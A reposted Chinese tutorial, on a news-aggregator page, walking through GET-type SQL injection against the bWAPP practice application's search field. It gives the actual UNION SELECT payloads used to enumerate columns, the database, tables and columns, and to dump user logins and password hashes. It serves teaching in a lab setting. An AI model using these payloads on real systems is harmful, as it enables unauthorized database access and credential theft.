二维码
微世推网

扫一扫关注

当前位置: 首页 » 快报资讯 » 今日快报 » 正文

SQL注入之GET型(search)

放大字体  缩小字体 发布日期:2022-11-25 15:01:19    作者:田关富    浏览次数:338
导读

0x01:测试分析我们进行测试这里是否存在SQL注入漏洞输入a'搜索后报错了,说明很大可能存在SQL注入漏洞了。0x02:爆字段(字段就是这个数据表中得列)order by 语句输入 a' order by 1 #输入a' order by 7#输入a' order by 8#由此可以判断出,库中有7个列。0x03:爆数据库名使用联

0x01:测试分析

我们进行测试这里是否存在SQL注入漏洞

输入a'

搜索后

报错了,说明很大可能存在SQL注入漏洞了。

0x02:爆字段(字段就是这个数据表中得列)

order by 语句

输入 a' order by 1 #

输入a' order by 7#

输入a' order by 8#

由此可以判断出,库中有7个列。

0x03:爆数据库名

使用联合查询注入union

输入a' union select 1,2,3,4,5,6,7#

可以看出是从2开始显示。

可以将2,3,5,4,替换成我们想要查询得信息

相关函数

system_user() 系统用户名

user() 用户名

current_user 当前用户名

session_user() 连接数据库得用户名

database() 数据库名

version() MYSQL数据库版本

load_file() MYSQL读取本地文件得函数

等等datadir 读取数据库路径

等等basedir MYSQL 安装路径

等等version_compile_os 操作系统

输入a' union select 1,database(),3,4,5,6,7#

可见当前数据库为bwapp

0x04:爆表(即获取当前数据表)

输入a' union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database()#

当前数据库(bwapp)中,有五张表,其中users比较重要。

0x05:获取后台账户用户名和密码

先查看users表得所有得列得信息

输入a' union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users'#

一共有9列。

其中得login和password,应该是我们有我们想要得东西。

那我们就去查出它们得信息

输入a' union select 1,login,password,4,5,6,7 from users#

获取login信息和password密码

其中密码是经过md5加密,我们需要去解密

 
(文/田关富)
免责声明
• 
本文仅代表发布者:田关富个人观点,本站未对其内容进行核实,请读者仅做参考,如若文中涉及有违公德、触犯法律的内容,一经发现,立即删除,需自行承担相应责任。涉及到版权或其他问题,请及时联系我们删除处理邮件:weilaitui@qq.com。
 

Copyright©2015-2025 粤公网安备 44030702000869号

粤ICP备16078936号

微信

关注
微信

微信二维码

WAP二维码

客服

联系
客服

联系客服:

24在线QQ: 770665880

客服电话: 020-82301567

E_mail邮箱: weilaitui@qq.com

微信公众号: weishitui

韩瑞 小英 张泽

工作时间:

周一至周五: 08:00 - 24:00

反馈

用户
反馈